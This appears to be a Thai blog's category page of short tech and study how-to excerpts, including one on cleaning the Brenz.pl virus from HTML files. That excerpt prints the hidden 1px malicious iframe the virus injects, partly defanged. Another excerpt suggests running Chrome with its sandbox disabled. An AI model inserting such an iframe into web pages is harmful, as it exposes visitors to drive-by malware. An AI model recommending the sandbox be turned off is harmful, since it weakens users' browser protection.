Category: ความรู้

การแก้ปัญหาเล่นเสียง mp3 ผ่านบราวเซอร์ แล้วมีข้อผิดพลาด javascript error 503 (Service Unavailable) on server, Play mp3 error

เขียนโปรแกรม ด้วย Javascript กับคำสั่งเล่นเสียง (Play sound) เพื่อให้เล่นเสียงผ่านบราวเซอร์ (Modern Browser) สามารถทำงานได้ปกติเมื่อทดสอบที่เครื่องตัวเอง (localhost) แต่เมื่อนำไปใช้งานบน web host แล้วเกิดข้อผิดพลาด 503 (Service Unavailable) ทำให้ไม่สามารถเล่นเสียงได้อย่างสมบูรณ์ ลองมาใช้วิธีตามบทความนี้ในการแก้ปัญหาลองดู วิธีการแก้ไขปัญหา ทำการแปลงไฟล์ format mp3 เป็น format ogg แล้วใช้งานคู่กันกับ mp3 แล้วใช้คำสั่ง html แทรก tag audio...

เกม การบวกเลข ออนไลน์ เวอร์ชั่นง่าย ไม่จับเวลา

การบวกจำนวนคืออะไร? การบวกเป็นวิธีการพื้นฐานทางคณิตศาสตร์ มีความจำเป็นในชีวิตประจำวัน โดยเป็นการรวมจำนวนเข้าด้วยกัน เป็นการนับต่อกัน ผลลัพธ์เป็นยอดรวมของตัวเลข เกมในแบบฝึกนี้เป็นแบบใด เกมในแบบฝึกนี้เป็นการฝึกการบวกเลข 2 จำนวน ประกอบด้วย เลขหลักหน่วย และเลขหลักสิบ ที่เป็นจำนวนไม่มากเกินไป เหมาะกับผู้เริ่มต้นการฝึก เพราะในเกมนี้ไม่จับเวลาในการคิด สามารถคิดได้นาน ๆ สำหรับน้อง ๆ ที่อยากฝึกการบวกพร้อมมีคนเฉลยให้ว่าถูกต้องหรือผิด ด้วยการสรุปผลยอดรวมการถูกผิด ทันทีที่ตอบ คำถามจะมีตัวเลือกตอบให้ เป็น 3 ตัวเลือก แต่ละปุ่มมีสีแยกจัดเจน ทำให้มองได้ชัดเจนได้มากขึ้น ตอบเสร็จก็จะเปลี่ยนข้อใหม่ทันที

คำนามในภาษาอังกฤษ (Singular and Plural Nouns)

คำนามในภาษาอังกฤษ เป็นคำที่มีความสำคัญในประโยคการสนทนา และการเขียน เพราะเป็นกลุ่มคำหลัก ๆ ที่จะใช้ในการสื่อความหมายให้เกิดความเข้าใจตรงกันในการสื่อสารอย่างแท้จริง คำนามในภาษาอังกฤษ จะเกี่ยวข้องกับการกล่าวถึงจำนวนหนึ่งอย่าง (Singular) หรือ จำนวนที่มากกว่าหนึ่งอย่าง (Plural) เช่น คน (People) สถานที่ (Places) สิ่งของ (Things) หรือ ความคิด (Ideas) เพราะการใช้คำนามต้องเลือกให้ถูกต้องตามลักษณะของประโยคในการสื่อสารด้วย ในการแปลงลักษณะคำนาม (Nouns) จากจำนวนหนึ่งอย่าง เป็นจำนวนที่มากกว่าหนึ่งอย่างนั้นก็มีกฎเกณฑ์มาตรฐานที่ควรเข้าใจ เพื่อให้การสื่อสารการพูดและการเขียนมีความถูกต้อง เพื่อให้การเรียนภาษาอังกฤษมีทักษะที่ดีขึ้นในการเลือกใช้คำนามให้ถูกต้องลักษณะของประโยคที่ต้องการสื่อสาร การใช้คำนาม การใช้คำนาม สามารถใช้เป็นประธานของประโยค (Subject) หรือ...

ปัญหา Google Chrome ใช้งานเว็บไซต์ไม่ได้ แสดงข้อความ แย่จัง! มีสิ่งผิดปกติเกิดขึ้นในขณะที่แสดงหน้าเว็บนี้ ดูข้อมูลเพิ่มเติม เปิดใหม่ แก้ได้ด้วย -no-sandbox

ปัญหา Google Chrome แสดงข้อความ แย่จัง! และไม่สามารถเข้าใช้งานเว็บได้ ทุกเว็บ แม้กระทั้งหน้าการตั้งค่า (Settings) ของตัว Google Chrome เองก็ยังไเข้าไม่ได้ ถอนการติดตั้งแล้ว ติดตั้งใหม่ก็ไม่สามารถเข้าใช้งานได้เหมือนเดิม ตอนนี้ยังหาสาเหตุไม่เจอว่าเกิดจากอะไร แต่ที่แน่ ๆ ไม่สามารถเข้าชมเว็บผ่านโปรแกรมนี้ได้เลย     วิธีการแก้ไข Google Chrome แสดงข้อความ แย่จัง! มีสิ่งผิดปกติเกิดขึ้นในขณะที่แสดงหน้าเว็บนี้ ดูข้อมูลเพิ่มเติม เปิดใหม่ มีวิธีการดังนี้ 1. คลิกขวาที่ไอคอน (Icon) ของโปรแกรม Google...

แก้ปัญหาไวรัส iframe Brenz.pl/rc/ ที่สร้างความวุ่นวายให้กับไฟล์ HTML ด้วยการตัดคำสั่งให้สั้นลง

จากที่เจอปัญหาเครื่องติดไวรัสดังกล่าวแล้ว ไวรัสจะสร้างปัญหาความวุ่นวายด้วยการสร้างคำสั่งของ iframe ดังนี้ <iframe style=”height:1px” src=”http://  www  &#46;   Brenz.pl/rc/” frameborder=0 width=1></iframe> โดยไฟล์ที่ติดไวรัส iframe Brenz.pl/rc/ นี้จะเป็นไฟล์ที่เกี่ยวข้องกับเว็บ เช่น html, php เป็นต้น และเป็นเฉพาะไฟล์ที่มีส่วนของ แท็ก <body></body> ไวรัสตัวนี้ก็จะสร้างแท็ก iframe ดังกล่าวขึ้นมา ภายในแท็ก <body></body> บริเวณด้านล่างของไฟล์ทันที แม้ไฟล์นั้นจะไม่ถูกเปิดขึ้นมาใช้งาน ซึ่งหากไฟล์ดังกล่าวไม่มี แท็ก <body></body> ปัญหานี้ก็จะไม่เกิดขึ้น...

การใช้ปุ่มลัด Shift + H ในโปรแกรม illustrator เพื่อปรับมุมมองการหมุนของ Artboard

ถ้าอยากหมุนหน้าจอออกแบบ Artboard เพื่อให้ง่ายต่อการทำงาน สามารถกดปุ่ม Shift + H หรือ เครื่องมือ Rotate view tool (Shift + H) ตัวชี้เมาส์จะเปลี่ยนจากลูกศรตามไอคอนเครื่องเมือ และจะสามารถหมุน Artboard ได้ ดังตัวอย่างภาพด้านล่าง

ปุ่ม Done ที่เมนู Crop Overlay ในโปรแกรม Lightroom หายไป

การซ่อนและแสดงปุ่ม Done ในมุมมอง Develop เพื่อจะตัดครอบ ภาพ (Crop Overlay) หายไป เรียกกลับมาด้วยแป้นคีย์ลัด ดัว T สลับไปมาเพื่อซ่อนและแสดง

แก้ปัญหา XAMPP สตาร์ท MySQL ไม่ได้ Error. MySQL shutdown unexpectedly

จากภาพด้านล้างปัญหาที่ MySQL แสดงปัญหาด้นล่าง Erro. MySQL shutdown unexpectedly 1.เข้าไปที่ Folder xampp 2.มองหา Folder mysql 3.ทำการเปลี่ยนชื่อ mysql/data เป็น mysql/data_old 4.ทำการคัดลอก Folder mysql/backup แล้ววาง แล้วเปลียนชื่อเป็น mysql/data 5.เอาข้อมูล database จาก mysql/data_old มาไว้ใน mysql/data (ยกเว้น mysql, performance_schema และ phpMyAdmin)...

การพิมพ์สัญลักษณ์องศา (° ) ในโปรแกรม Microsoft word

สัญลักษณ์องศา หรือสัญลักษณ์วงกลมแบบโปร่ง หรือวงกลมที่มีเส้นรอบวงและพื้นที่ตรงกลางเป็นสีขาว อธิบายแล้วก็งงดี บางครั้งเราก็มีความจำเป็นที่จะใช้สัญลักษณ์ดังกล่าวในงานเอกสารเพื่อการสื่อความหมาย ที่ให้ผู้อ่านได้เข้าใจความหมายมากยิ่งขึ้นมากกว่าการเขียนคำด้วยตัวอักษร   ในโปรแกรม Microsoft word มีตัวเลือกของแทนแก้ไขคำอัตโนมัติที่ช่วยให้เราสามารถพิมพ์สัญลักษณ์ดังกล่าวได้ง่ายขึ้นแทนการค้นหาสัญลักษณ์แล้วแทรกลงไป โดยสามารถพิมพ์คำว่า \degree แล้วเคาะวรรค โปรแกรมก็จะแปลงคำดังกล่าวเป็นสัญลักษณ์วงกลมให้ทันทีตามภาพด้านหลัง °  นี้   ตัวอย่างข้อความ เราต้องการหมุนข้อความทั้งหมดไปในแนวมุม 270°  เป็นต้น